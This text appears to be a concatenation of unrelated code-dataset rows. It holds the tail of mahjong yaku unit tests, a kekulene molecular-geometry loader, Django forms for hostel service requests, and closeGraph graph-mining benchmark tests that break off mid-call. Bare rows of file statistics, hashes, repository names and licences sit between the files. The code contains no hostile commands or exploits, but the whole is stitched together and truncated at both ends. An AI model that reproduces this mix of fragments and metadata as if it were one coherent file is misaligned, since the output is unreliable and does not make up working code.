        self.player.agari_tile = Tile(Suit.SOUZU.value, 5)
        self.player.menzenchin = False
        machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
        yaku_types = Koutsu(
            self.player, self.stack, machi_tiles, self.bakaze, True)
        self.assertEqual(yaku_types.sankantsu(), True)
        self.assertEqual(yaku_types.total_yaku, ['sankantsu'])
        self.assertEqual(yaku_types.total_han, [2])

class TestSanshoku(unittest.TestCase):
    def setUp(self):
        self.player = Player('test', 0)
        self.stack = Stack()
        self.bakaze = Jihai.TON

    def test_no_sanshoku_doukou(self):  # 三色同刻
        self.player.hand[Tile(Suit.SOUZU.value, 5).index] += 2
        self.player.hand[Tile(Suit.PINZU.value, 2).index] += 3
        for i in range(7, 10):
            self.player.hand[Tile(Suit.MANZU.value, i).index] += 1
        self.player.hand[Tile(Suit.PINZU.value, 9).index] += 2
        naki_tile = Tile(Suit.MANZU.value, 2)
        naki_tile.owner = 2
        self.player.kabe.append(
            Huro(Naki.PON, naki_tile,
                 [Tile(Suit.MANZU.value, 2) for i in range(1, 4)]))
        self.player.agari_tile = Tile(Suit.SOUZU.value, 2)
        self.player.menzenchin = False
        machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
        yaku_types = Sanshoku(
            self.player, self.stack, machi_tiles, self.bakaze, True)
        self.assertEqual(yaku_types.sanshoku_doukou(), False)
        self.assertEqual(yaku_types.total_yaku, [])
        self.assertEqual(yaku_types.total_han, [])

    def test_sanshoku_doukou(self):  # 三色同刻
        self.player.hand[Tile(Suit.SOUZU.value, 2).index] += 2
        self.player.hand[Tile(Suit.PINZU.value, 2).index] += 3
        for i in range(7, 10):
            self.player.hand[Tile(Suit.MANZU.value, i).index] += 1
        self.player.hand[Tile(Suit.PINZU.value, 9).index] += 2
        naki_tile = Tile(Suit.MANZU.value, 2)
        naki_tile.owner = 2
        self.player.kabe.append(
            Huro(Naki.PON, naki_tile,
                 [Tile(Suit.MANZU.value, 2) for i in range(1, 4)]))
        self.player.agari_tile = Tile(Suit.SOUZU.value, 2)
        self.player.menzenchin = False
        machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
        yaku_types = Sanshoku(
            self.player, self.stack, machi_tiles, self.bakaze, True)
        self.assertEqual(yaku_types.sanshoku_doukou(), True)
        self.assertEqual(yaku_types.total_yaku, ['sanshoku_doukou'])
        self.assertEqual(yaku_types.total_han, [2])

    def test_no_sanshoku_doujun(self):  # 三色同順
        for i in range(4, 7):
            self.player.hand[Tile(Suit.MANZU.value, i).index] += 1
            self.player.hand[Tile(Suit.SOUZU.value, i).index] += 1
            self.player.hand[Tile(Suit.PINZU.value, i + 1).index] += 1
        for i in range(7, 10):
            self.player.hand[Tile(Suit.MANZU.value, i).index] += 1
        self.player.hand[Tile(Suit.PINZU.value, 9).index] += 1
        self.player.agari_tile = Tile(Suit.PINZU.value, 9)
        machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
        yaku_types = Sanshoku(
            self.player, self.stack, machi_tiles, self.bakaze, True)
        self.assertEqual(yaku_types.sanshoku_doujun(), False)
        self.assertEqual(yaku_types.total_yaku, [])
        self.assertEqual(yaku_types.total_han, [])

    def test_sanshoku_doujun_closed(self):  # 三色同順
        for i in range(4, 7):
            self.player.hand[Tile(Suit.MANZU.value, i).index] += 1
            self.player.hand[Tile(Suit.SOUZU.value, i).index] += 1
            self.player.hand[Tile(Suit.PINZU.value, i).index] += 1
        for i in range(7, 10):
            self.player.hand[Tile(Suit.MANZU.value, i).index] += 1
        self.player.hand[Tile(Suit.PINZU.value, 9).index] += 1
        self.player.agari_tile = Tile(Suit.PINZU.value, 9)
        machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
        yaku_types = Sanshoku(
            self.player, self.stack, machi_tiles, self.bakaze, True)
        self.assertEqual(yaku_types.sanshoku_doujun(), True)
        self.assertEqual(yaku_types.total_yaku, ['sanshoku_doujun'])
        self.assertEqual(yaku_types.total_han, [2])

    def test_sanshoku_doujun_opened(self):  # 三色同順
        for i in range(4, 7):
            self.player.hand[Tile(Suit.SOUZU.value, i).index] += 1
            self.player.hand[Tile(Suit.PINZU.value, i).index] += 1
        for i in range(7, 10):
            self.player.hand[Tile(Suit.MANZU.value, i).index] += 1
        self.player.hand[Tile(Suit.PINZU.value, 9).index] += 1
        naki_tile = Tile(Suit.MANZU.value, 4)
        naki_tile.owner = 2
        self.player.kabe.append(
            Huro(Naki.CHII, naki_tile,
                 [Tile(Suit.MANZU.value, i) for i in range(4, 7)]))
        self.player.agari_tile = Tile(Suit.PINZU.value, 9)
        self.player.menzenchin = False
        machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
        yaku_types = Sanshoku(
            self.player, self.stack, machi_tiles, self.bakaze, True)
        self.assertEqual(yaku_types.sanshoku_doujun(), True)
        self.assertEqual(yaku_types.total_yaku, ['sanshoku_doujun'])
        self.assertEqual(yaku_types.total_han, [1])

class TestSomete(unittest.TestCase):
    def setUp(self):
        self.player = Player('test', 0)
        self.stack = Stack()
        self.bakaze = Jihai.TON

    def test_no_chiniisou(self):  # 清一色
        self.player.hand[Tile(Suit.MANZU.value, 2).index] += 3
        self.player.hand[Tile(Suit.SOUZU.value, 4).index] += 3
        self.player.hand[Tile(Suit.SOUZU.value, 6).index] += 3
        self.player.hand[Tile(Suit.SOUZU.value, 8).index] += 3
        self.player.hand[Tile(Suit.SOUZU.value, 1).index] += 1
        self.player.agari_tile = Tile(Suit.SOUZU.value, 1)
        machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
        yaku_types = Somete(
            self.player, self.stack, machi_tiles, self.bakaze, True)
        self.assertEqual(yaku_types.chiniisou(), False)
        self.assertEqual(yaku_types.total_yaku, [])
        self.assertEqual(yaku_types.total_han, [])

    def test_chiniisou_closed(self):  # 清一色
        self.player.hand[Tile(Suit.SOUZU.value, 2).index] += 3
        self.player.hand[Tile(Suit.SOUZU.value, 4).index] += 3
        self.player.hand[Tile(Suit.SOUZU.value, 6).index] += 3
        self.player.hand[Tile(Suit.SOUZU.value, 8).index] += 3
        self.player.hand[Tile(Suit.SOUZU.value, 1).index] += 1
        self.player.agari_tile = Tile(Suit.SOUZU.value, 1)
        machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
        yaku_types = Somete(
            self.player, self.stack, machi_tiles, self.bakaze, True)
        self.assertEqual(yaku_types.chiniisou(), True)
        self.assertEqual(yaku_types.total_yaku, ['chiniisou'])
        self.assertEqual(yaku_types.total_han, [6])

    def test_chiniisou_opened(self):  # 清一色
        self.player.hand[Tile(Suit.SOUZU.value, 2).index] += 3
        self.player.hand[Tile(Suit.SOUZU.value, 4).index] += 3
        self.player.hand[Tile(Suit.SOUZU.value, 6).index] += 3
        self.player.hand[Tile(Suit.SOUZU.value, 1).index] += 1
        naki_tile = Tile(Suit.SOUZU.value, 8)
        naki_tile.owner = 2
        self.player.kabe.append(
            Huro(Naki.PON, naki_tile,
                 [Tile(Suit.SOUZU.value, 8) for i in range(1, 4)]))
        self.player.agari_tile = Tile(Suit.SOUZU.value, 1)
        self.player.menzenchin = False
        machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
        yaku_types = Somete(
            self.player, self.stack, machi_tiles, self.bakaze, True)
        self.assertEqual(yaku_types.chiniisou(), True)
        self.assertEqual(yaku_types.total_yaku, ['chiniisou'])
        self.assertEqual(yaku_types.total_han, [5])

    def test_no_honiisou(self):  # 混一色
        self.player.hand[Tile(Suit.JIHAI.value, Jihai.CHUN.value).index] += 3
        self.player.hand[Tile(Suit.MANZU.value, 4).index] += 3
        self.player.hand[Tile(Suit.SOUZU.value, 6).index] += 3
        self.player.hand[Tile(Suit.SOUZU.value, 8).index] += 3
        self.player.hand[Tile(Suit.SOUZU.value, 1).index] += 1
        self.player.agari_tile = Tile(Suit.SOUZU.value, 1)
        machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
        yaku_types = Somete(
            self.player, self.stack, machi_tiles, self.bakaze, True)
        self.assertEqual(yaku_types.honiisou(), False)
        self.assertEqual(yaku_types.total_yaku, [])
        self.assertEqual(yaku_types.total_han, [])

    def test_honiisou_closed(self):  # 混一色
        self.player.hand[Tile(Suit.JIHAI.value, Jihai.CHUN.value).index] += 3
        self.player.hand[Tile(Suit.SOUZU.value, 4).index] += 3
        self.player.hand[Tile(Suit.SOUZU.value, 6).index] += 3
        self.player.hand[Tile(Suit.SOUZU.value, 8).index] += 3
        self.player.hand[Tile(Suit.SOUZU.value, 1).index] += 1
        self.player.agari_tile = Tile(Suit.SOUZU.value, 1)
        machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
        yaku_types = Somete(
            self.player, self.stack, machi_tiles, self.bakaze, True)
        self.assertEqual(yaku_types.honiisou(), True)
        self.assertEqual(yaku_types.total_yaku, ['honiisou'])
        self.assertEqual(yaku_types.total_han, [3])

    def test_honiisou_opened(self):  # 混一色
        self.player.hand[Tile(Suit.SOUZU.value, 4).index] += 3
        self.player.hand[Tile(Suit.SOUZU.value, 6).index] += 3
        self.player.hand[Tile(Suit.SOUZU.value, 8).index] += 3
        self.player.hand[Tile(Suit.SOUZU.value, 1).index] += 1
        naki_tile = Tile(Suit.JIHAI.value, Jihai.CHUN.value)
        naki_tile.owner = 2
        self.player.kabe.append(
            Huro(Naki.PON, naki_tile,
                 [Tile(Suit.JIHAI.value, Jihai.CHUN.value)
                  for i in range(1, 4)]))
        self.player.agari_tile = Tile(Suit.SOUZU.value, 1)
        self.player.menzenchin = False
        machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
        yaku_types = Somete(
            self.player, self.stack, machi_tiles, self.bakaze, True)
        self.assertEqual(yaku_types.honiisou(), True)
        self.assertEqual(yaku_types.total_yaku, ['honiisou'])
        self.assertEqual(yaku_types.total_han, [2])
| 44.794872 | 79 | 0.6284 | 10,494 | 75,121 | 4.39089 | 0.018296 | 0.16841 | 0.137636 | 0.146881 | 0.972395 | 0.972308 | 0.970854 | 0.95347 | 0.946113 | 0.938062 | 0 | 0.018708 | 0.230082 | 75,121 | 1,676 | 80 | 44.821599 | 0.777979 | 0.005418 | 0 | 0.848962 | 0 | 0 | 0.006981 | 0 | 0 | 0 | 0 | 0 | 0.165354 | 1 | 0.06514 | false | 0 | 0.004295 | 0 | 0.075161 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c0401c238b618fac336fbf90718a073e1c2f560e | 4,178 | py | Python | lib/systems/kekulene.py | pulsar-chem/BPModule | f8e64e04fdb01947708f098e833600c459c2ff0e | [
"BSD-3-Clause"
] | null | null | null | lib/systems/kekulene.py | pulsar-chem/BPModule | f8e64e04fdb01947708f098e833600c459c2ff0e | [
"BSD-3-Clause"
] | null | null | null | lib/systems/kekulene.py | pulsar-chem/BPModule | f8e64e04fdb01947708f098e833600c459c2ff0e | [
"BSD-3-Clause"
] | null | null | null | import pulsar as psr
def load_ref_system():
""" Returns kekulene as found in the IQMol fragment library.
All credit to https://github.com/nutjunkie/IQmol
"""
return psr.make_system("""
C 2.58641 1.49327 0.00000
C 2.58641 -1.49327 0.00000
C 0.00000 2.98653 0.00000
C 3.77204 0.72177 0.00000
C 2.51109 2.90580 0.00000
C 3.77204 -0.72177 0.00000
C 1.26095 3.62757 0.00000
C -0.00000 -2.98653 -0.00000
C -2.58641 1.49327 -0.00000
C 2.51109 -2.90580 0.00000
C -1.26095 3.62757 -0.00000
C 4.97852 1.43520 0.00000
C 3.73219 3.59392 0.00000
C -2.58641 -1.49327 -0.00000
C 1.26095 -3.62757 0.00000
C -2.51109 2.90580 -0.00000
C 4.97852 -1.43520 0.00000
C 1.24634 5.02913 0.00000
C 4.94467 2.85481 0.00000
C -1.26095 -3.62757 -0.00000
C -3.77204 0.72177 -0.00000
C 3.73219 -3.59392 0.00000
C -1.24634 5.02913 0.00000
C 6.17759 0.70266 0.00000
C 3.69732 4.99862 0.00000
C -2.51109 -2.90580 -0.00000
C -3.77204 -0.72177 -0.00000
C 4.94467 -2.85481 0.00000
C 0.00000 5.70962 0.00000
C 6.17759 -0.70266 0.00000
C 2.48027 5.70128 0.00000
C 1.24634 -5.02913 -0.00000
C -3.73219 3.59392 -0.00000
C -1.24634 -5.02913 -0.00000
C -4.97852 1.43520 -0.00000
C 3.69732 -4.99862 0.00000
C -2.48027 5.70128 -0.00000
C -3.73219 -3.59392 -0.00000
C -4.97852 -1.43520 -0.00000
C -0.00000 -5.70962 -0.00000
C -4.94467 2.85481 -0.00000
C 2.48027 -5.70128 0.00000
C -3.69732 4.99862 -0.00000
C -4.94467 -2.85481 -0.00000
C -2.48027 -5.70128 -0.00000
C -6.17759 0.70266 -0.00000
C -3.69732 -4.99862 -0.00000
C -6.17759 -0.70266 -0.00000
H 1.65272 0.95420 0.00000
H 1.65272 -0.95420 0.00000
H 0.00000 1.90840 0.00000
H -0.00000 -1.90840 -0.00000
H -1.65272 0.95420 -0.00000
H -1.65272 -0.95420 -0.00000
H 5.88815 3.39953 0.00000
H 7.13332 1.22331 0.00000
H 4.62608 5.56598 0.00000
H 5.88815 -3.39953 0.00000
H 0.00000 6.79905 0.00000
H 7.13332 -1.22331 0.00000
H 2.50724 6.78929 0.00000
H 4.62608 -5.56598 0.00000
H -2.50724 6.78929 -0.00000
H -0.00000 -6.79905 -0.00000
H -5.88815 3.39953 -0.00000
H 2.50724 -6.78929 0.00000
H -4.62608 5.56598 -0.00000
H -5.88815 -3.39953 -0.00000
H -2.50724 -6.78929 -0.00000
H -7.13332 1.22331 -0.00000
H -4.62608 -5.56598 -0.00000
H -7.13332 -1.22331 -0.00000
""")
| 52.225 | 64 | 0.361178 | 533 | 4,178 | 2.825516 | 0.135084 | 0.318725 | 0.21846 | 0.063745 | 0.908367 | 0.908367 | 0.908367 | 0.908367 | 0.908367 | 0.879814 | 0 | 0.697524 | 0.55529 | 4,178 | 79 | 65 | 52.886076 | 0.113025 | 0.025132 | 0 | 0 | 0 | 0 | 0.979275 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.013158 | true | 0 | 0.013158 | 0 | 0.039474 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 13 |
c0507b05aebcab634f0e20ca528ec30d2272a81d | 3,449 | py | Python | core/forms.py | hari01584/project__UNIAutoMate__MakeAThon3077 | de3f32a13dc12587ed37947d37ee918c8fa43e80 | [
"MIT"
] | 3 | 2021-03-08T16:29:20.000Z | 2022-03-01T10:07:52.000Z | core/forms.py | hari01584/project__UNIAutoMate__MakeAThon3077 | de3f32a13dc12587ed37947d37ee918c8fa43e80 | [
"MIT"
] | null | null | null | core/forms.py | hari01584/project__UNIAutoMate__MakeAThon3077 | de3f32a13dc12587ed37947d37ee918c8fa43e80 | [
"MIT"
] | 3 | 2021-03-05T16:58:54.000Z | 2022-03-01T10:07:56.000Z | # -*- encoding: utf-8 -*-
"""
Copyright (c) 2019 - present AppSeed.us
"""
from django import forms
from django.forms import ModelForm
from core.models import roomRequest, complains, medical, laundaryRequest
class RoomCleaningForm(forms.ModelForm):
name = forms.CharField(
widget=forms.TextInput(
attrs={
"class": "form-control"
}
))
roomNo = forms.CharField(
widget=forms.TextInput(
attrs={
"class": "form-control"
}
))
PhoneNo = forms.CharField(
widget=forms.TextInput(
attrs={
"class": "form-control"
}
))
TimeCleaning = forms.CharField(
widget=forms.TextInput(
attrs={
"class": "form-control"
}
))
class Meta:
model = roomRequest
fields = ('name', 'roomNo', 'PhoneNo', 'TimeCleaning')
class medicalForm(forms.ModelForm):
name = forms.CharField(
widget=forms.TextInput(
attrs={
"class": "form-control"
}
))
roomno = forms.CharField(
widget=forms.TextInput(
attrs={
"class": "form-control"
}
))
phoneno = forms.CharField(
widget=forms.TextInput(
attrs={
"class": "form-control"
}
))
date = forms.CharField(
widget=forms.TextInput(
attrs={
"class": "form-control"
}
))
problem = forms.CharField(
widget=forms.TextInput(
attrs={
"class": "form-control"
}
))
time = forms.CharField(
widget=forms.TextInput(
attrs={
"class": "form-control"
}
))
class Meta:
model = medical
fields = ('name', 'roomno', 'phoneno', 'date', 'problem', 'time')
class ComplaintForm(forms.ModelForm):
name = forms.CharField(
widget=forms.TextInput(
attrs={
"class": "form-control"
}
))
roomno = forms.CharField(
widget=forms.TextInput(
attrs={
"class": "form-control"
}
))
phoneno = forms.CharField(
widget=forms.TextInput(
attrs={
"class": "form-control"
}
))
complaint = forms.CharField(
widget=forms.TextInput(
attrs={
"class": "form-control"
}
))
class Meta:
model = complains
fields = ('name', 'roomno', 'phoneno', 'complaint')
class LaundaryForm(forms.ModelForm):
name = forms.CharField(
widget=forms.TextInput(
attrs={
"class": "form-control"
}
))
roomno = forms.CharField(
widget=forms.TextInput(
attrs={
"class": "form-control"
}
))
phoneno = forms.CharField(
widget=forms.TextInput(
attrs={
"class": "form-control"
}
))
time = forms.CharField(
widget=forms.TextInput(
attrs={
"class": "form-control"
}
))
class Meta:
model = laundaryRequest
fields = ('name', 'roomno', 'phoneno', 'time')
| 22.993333 | 73 | 0.467092 | 260 | 3,449 | 6.196154 | 0.161538 | 0.156425 | 0.223464 | 0.27933 | 0.731223 | 0.731223 | 0.731223 | 0.731223 | 0.731223 | 0.697083 | 0 | 0.002467 | 0.412293 | 3,449 | 149 | 74 | 23.147651 | 0.792304 | 0.018556 | 0 | 0.692913 | 0 | 0 | 0.122594 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.023622 | 0 | 0.228346 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c050c941b2992979d3ec2a94c547a3191fb6c698 | 15,032 | py | Python | gspan_mining/benchmarkTests.py | NaazS03/TestingCloseGraph | 60666b4da4e0ec43ce53290336a3266c9d01d366 | [
"MIT"
] | null | null | null | gspan_mining/benchmarkTests.py | NaazS03/TestingCloseGraph | 60666b4da4e0ec43ce53290336a3266c9d01d366 | [
"MIT"
] | null | null | null | gspan_mining/benchmarkTests.py | NaazS03/TestingCloseGraph | 60666b4da4e0ec43ce53290336a3266c9d01d366 | [
"MIT"
] | null | null | null | import unittest
from closegraph import closeGraph
class CompoundBenchmarkTests(unittest.TestCase):
"""
Before running a benchmark test
make sure that @profile is not commented out in gSpan if memory usage info is desired
@profile lets the memory profiler work
"""
# The test below took longer than 12 hours to complete. Results unknown
# def test_compound_min_graph_size_2_support_3_percent(self):
# graph_dataset_size = 422
#
# file_name = "../graphdata/benchmark_tests/Coumpound_422.txt"
# supp = graph_dataset_size * 0.03
# min_size_graph = 2
# gs = gSpan(
# database_file_name=file_name,
# min_support=supp,
# min_num_vertices=min_size_graph
# )
# gs.run()
    def test_compound_min_graph_size_2_support_4_percent(self):
        graph_dataset_size = 422
        file_name = "../graphdata/benchmark_tests/Coumpound_422.txt"
        supp = graph_dataset_size * 0.04
        min_size_graph = 2
        cg = closeGraph(
            database_file_name=file_name,
            min_support=supp,
            min_num_vertices=min_size_graph
        )
        cg.run()
        cg.time_stats()
        cg.graph_dataset_stats()

    def test_compound_min_graph_size_2_support_5_percent(self):
        graph_dataset_size = 422
        file_name = "../graphdata/benchmark_tests/Coumpound_422.txt"
        supp = graph_dataset_size * 0.05
        min_size_graph = 2
        cg = closeGraph(
            database_file_name=file_name,
            min_support=supp,
            min_num_vertices=min_size_graph
        )
        cg.run()
        cg.time_stats()
        cg.graph_dataset_stats()

    def test_compound_min_graph_size_2_support_6_percent(self):
        graph_dataset_size = 422
        file_name = "../graphdata/benchmark_tests/Coumpound_422.txt"
        supp = graph_dataset_size * 0.06
        min_size_graph = 2
        cg = closeGraph(
            database_file_name=file_name,
            min_support=supp,
            min_num_vertices=min_size_graph
        )
        cg.run()
        cg.time_stats()
        cg.graph_dataset_stats()

    def test_compound_min_graph_size_2_support_7_percent(self):
        graph_dataset_size = 422
        file_name = "../graphdata/benchmark_tests/Coumpound_422.txt"
        supp = graph_dataset_size * 0.07
        min_size_graph = 2
        cg = closeGraph(
            database_file_name=file_name,
            min_support=supp,
            min_num_vertices=min_size_graph
        )
        cg.run()
        cg.time_stats()
        cg.graph_dataset_stats()

    def test_compound_min_graph_size_2_support_8_percent(self):
        graph_dataset_size = 422
        file_name = "../graphdata/benchmark_tests/Coumpound_422.txt"
        supp = graph_dataset_size * 0.08
        min_size_graph = 2
        cg = closeGraph(
            database_file_name=file_name,
            min_support=supp,
            min_num_vertices=min_size_graph
        )
        cg.run()
        cg.time_stats()
        cg.graph_dataset_stats()

    def test_compound_min_graph_size_2_support_9_percent(self):
        graph_dataset_size = 422
        file_name = "../graphdata/benchmark_tests/Coumpound_422.txt"
        supp = graph_dataset_size * 0.09
        min_size_graph = 2
        cg = closeGraph(
            database_file_name=file_name,
            min_support=supp,
            min_num_vertices=min_size_graph
        )
        cg.run()
        cg.time_stats()
        cg.graph_dataset_stats()

    def test_compound_min_graph_size_2_support_10_percent(self):
        graph_dataset_size = 422
        file_name = "../graphdata/benchmark_tests/Coumpound_422.txt"
        supp = graph_dataset_size * 0.1
        min_size_graph = 2
        cg = closeGraph(
            database_file_name=file_name,
            min_support=supp,
            min_num_vertices=min_size_graph
        )
        cg.run()
        cg.time_stats()
        cg.graph_dataset_stats()

    def test_compound_min_graph_size_7_support_5_percent(self):
        graph_dataset_size = 422
        file_name = "../graphdata/benchmark_tests/Coumpound_422.txt"
        supp = graph_dataset_size * 0.05
        min_size_graph = 7
        cg = closeGraph(
            database_file_name=file_name,
            min_support=supp,
            min_num_vertices=min_size_graph
        )
        cg.run()
        cg.time_stats()

    def test_compound_min_graph_size_12_support_5_percent(self):
        graph_dataset_size = 422
        file_name = "../graphdata/benchmark_tests/Coumpound_422.txt"
        supp = graph_dataset_size * 0.05
        min_size_graph = 12
        cg = closeGraph(
            database_file_name=file_name,
            min_support=supp,
            min_num_vertices=min_size_graph
        )
        cg.run()
        cg.time_stats()

    def test_compound_min_graph_size_17_support_5_percent(self):
        graph_dataset_size = 422
        file_name = "../graphdata/benchmark_tests/Coumpound_422.txt"
        supp = graph_dataset_size * 0.05
        min_size_graph = 17
        cg = closeGraph(
            database_file_name=file_name,
            min_support=supp,
            min_num_vertices=min_size_graph
        )
        cg.run()
        cg.time_stats()

    def test_compound_min_graph_size_22_support_5_percent(self):
        graph_dataset_size = 422
        file_name = "../graphdata/benchmark_tests/Coumpound_422.txt"
        supp = graph_dataset_size * 0.05
        min_size_graph = 22
        cg = closeGraph(
            database_file_name=file_name,
            min_support=supp,
            min_num_vertices=min_size_graph
        )
        cg.run()
        cg.time_stats()

    def test_compound_min_graph_size_27_support_5_percent(self):
        graph_dataset_size = 422
        file_name = "../graphdata/benchmark_tests/Coumpound_422.txt"
        supp = graph_dataset_size * 0.05
        min_size_graph = 27
        cg = closeGraph(
            database_file_name=file_name,
            min_support=supp,
            min_num_vertices=min_size_graph
        )
        cg.run()
        cg.time_stats()

    def test_compound_min_graph_size_32_support_5_percent(self):
        graph_dataset_size = 422
        file_name = "../graphdata/benchmark_tests/Coumpound_422.txt"
        supp = graph_dataset_size * 0.05
        min_size_graph = 32
        cg = closeGraph(
            database_file_name=file_name,
            min_support=supp,
            min_num_vertices=min_size_graph
        )
        cg.run()
        cg.time_stats()

    def test_compound_min_graph_size_37_support_5_percent(self):
        graph_dataset_size = 422
        file_name = "../graphdata/benchmark_tests/Coumpound_422.txt"
        supp = graph_dataset_size * 0.05
        min_size_graph = 37
        cg = closeGraph(
            database_file_name=file_name,
            min_support=supp,
            min_num_vertices=min_size_graph
        )
        cg.run()
        cg.time_stats()

    def test_compound_min_graph_size_42_support_5_percent(self):
        graph_dataset_size = 422
        file_name = "../graphdata/benchmark_tests/Coumpound_422.txt"
        supp = graph_dataset_size * 0.05
        min_size_graph = 42
        cg = closeGraph(
            database_file_name=file_name,
            min_support=supp,
            min_num_vertices=min_size_graph
        )
        cg.run()
        cg.time_stats()

class ChemicalBenchmarkTests(unittest.TestCase):
    @classmethod
    def setUpClass(cls) -> None:
        cls.f = open("benchmarkCloseGraphOutput.txt", "w")

    @classmethod
    def tearDownClass(cls) -> None:
        cls.f.close()

    def updateOutput(self, results):
        self.f.write(str(sorted(results)) + "\n")

    def convert_results_format(self, results):
        results_as_tuples = []
        for result in results:
            support, description, num_vertices = result[0], result[1], result[2]
            results_as_tuples.append((support, description, num_vertices))
        return results_as_tuples
    def test_chemical_min_graph_size_2_support_3_percent(self):
        graph_dataset_size = 340
        file_name = "../graphdata/benchmark_tests/Chemical_340.txt"
        supp = graph_dataset_size * 0.03
        min_size_graph = 2
        cg = closeGraph(
            database_file_name=file_name,
            min_support=supp,
            min_num_vertices=min_size_graph
        )
        cg.run()
        cg.time_stats()
        cg.graph_dataset_stats()

    def test_chemical_min_graph_size_2_support_4_percent(self):
        graph_dataset_size = 340
        file_name = "../graphdata/benchmark_tests/Chemical_340.txt"
        supp = graph_dataset_size * 0.04
        min_size_graph = 2
        cg = closeGraph(
            database_file_name=file_name,
            min_support=supp,
            min_num_vertices=min_size_graph
        )
        cg.run()
        cg.time_stats()
        cg.graph_dataset_stats()

    def test_chemical_min_graph_size_2_support_5_percent(self):
        graph_dataset_size = 340
        file_name = "../graphdata/benchmark_tests/Chemical_340.txt"
        supp = graph_dataset_size * 0.05
        min_size_graph = 2
        cg = closeGraph(
            database_file_name=file_name,
            min_support=supp,
            min_num_vertices=min_size_graph
        )
        cg.run()
        cg.time_stats()
        cg.graph_dataset_stats()

    def test_chemical_min_graph_size_2_support_6_percent(self):
        graph_dataset_size = 340
        file_name = "../graphdata/benchmark_tests/Chemical_340.txt"
        supp = graph_dataset_size * 0.06
        min_size_graph = 2
        cg = closeGraph(
            database_file_name=file_name,
            min_support=supp,
            min_num_vertices=min_size_graph
        )
        cg.run()
        cg.time_stats()
        cg.graph_dataset_stats()

    def test_chemical_min_graph_size_2_support_7_percent(self):
        graph_dataset_size = 340
        file_name = "../graphdata/benchmark_tests/Chemical_340.txt"
        supp = graph_dataset_size * 0.07
        min_size_graph = 2
        cg = closeGraph(
            database_file_name=file_name,
            min_support=supp,
            min_num_vertices=min_size_graph
        )
        cg.run()
        cg.time_stats()
        cg.graph_dataset_stats()

    def test_chemical_min_graph_size_2_support_8_percent(self):
        graph_dataset_size = 340
        file_name = "../graphdata/benchmark_tests/Chemical_340.txt"
        supp = graph_dataset_size * 0.08
        min_size_graph = 2
        cg = closeGraph(
            database_file_name=file_name,
            min_support=supp,
            min_num_vertices=min_size_graph
        )
        cg.run()
        cg.time_stats()
        cg.graph_dataset_stats()

    def test_chemical_min_graph_size_2_support_9_percent(self):
        graph_dataset_size = 340
        file_name = "../graphdata/benchmark_tests/Chemical_340.txt"
        supp = graph_dataset_size * 0.09
        min_size_graph = 2
        cg = closeGraph(
            database_file_name=file_name,
            min_support=supp,
            min_num_vertices=min_size_graph
        )
        cg.run()
        cg.time_stats()
        cg.graph_dataset_stats()

    def test_chemical_min_graph_size_2_support_10_percent(self):
        graph_dataset_size = 340
        file_name = "../graphdata/benchmark_tests/Chemical_340.txt"
        supp = graph_dataset_size * 0.1
        min_size_graph = 2
        cg = closeGraph(
            database_file_name=file_name,
            min_support=supp,
            min_num_vertices=min_size_graph
        )
        cg.run()
        cg.time_stats()
        cg.graph_dataset_stats()
    # End of min support tests
    def test_chemical_min_graph_size_2(self):
        graph_dataset_size = 340
        file_name = "../graphdata/benchmark_tests/Chemical_340.txt"
        supp = graph_dataset_size * 0.45
        min_size_graph = 2
        cg = closeGraph(
            database_file_name=file_name,
            min_support=supp,
            min_num_vertices=min_size_graph
        )
        cg.run()
        cg.time_stats()
        cg.graph_dataset_stats()
        results = cg._report_df.to_numpy().astype(str)
        results = self.convert_results_format(results)
        self.updateOutput(results)
    # Start of min graph size tests
    def test_chemical_min_graph_size_7_support_5_percent(self):
        graph_dataset_size = 340
        file_name = "../graphdata/benchmark_tests/Chemical_340.txt"
        supp = graph_dataset_size * 0.05
        min_size_graph = 7
        cg = closeGraph(
            database_file_name=file_name,
            min_support=supp,
            min_num_vertices=min_size_graph
        )
        cg.run()
        cg.time_stats()

    def test_chemical_min_graph_size_12_support_5_percent(self):
        graph_dataset_size = 340
        file_name = "../graphdata/benchmark_tests/Chemical_340.txt"
        supp = graph_dataset_size * 0.05
        min_size_graph = 12
        cg = closeGraph(
            database_file_name=file_name,
            min_support=supp,
            min_num_vertices=min_size_graph
        )
        cg.run()
        cg.time_stats()

    def test_chemical_min_graph_size_17_support_5_percent(self):
        graph_dataset_size = 340
        file_name = "../graphdata/benchmark_tests/Chemical_340.txt"
        supp = graph_dataset_size * 0.05
        min_size_graph = 17
        cg = closeGraph(
            database_file_name=file_name,
            min_support=supp,
            min_num_vertices=min_size_graph
        )
        cg.run()
        cg.time_stats()

    def test_chemical_min_graph_size_22_support_5_percent(self):
        graph_dataset_size = 340
        file_name = "../graphdata/benchmark_tests/Chemical_340.txt"
        supp = graph_dataset_size * 0.05
        min_size_graph = 22
        cg = closeGraph(
            database_file_name=file_name,
            min_support=supp,
            min_num_vertices=min_size_graph
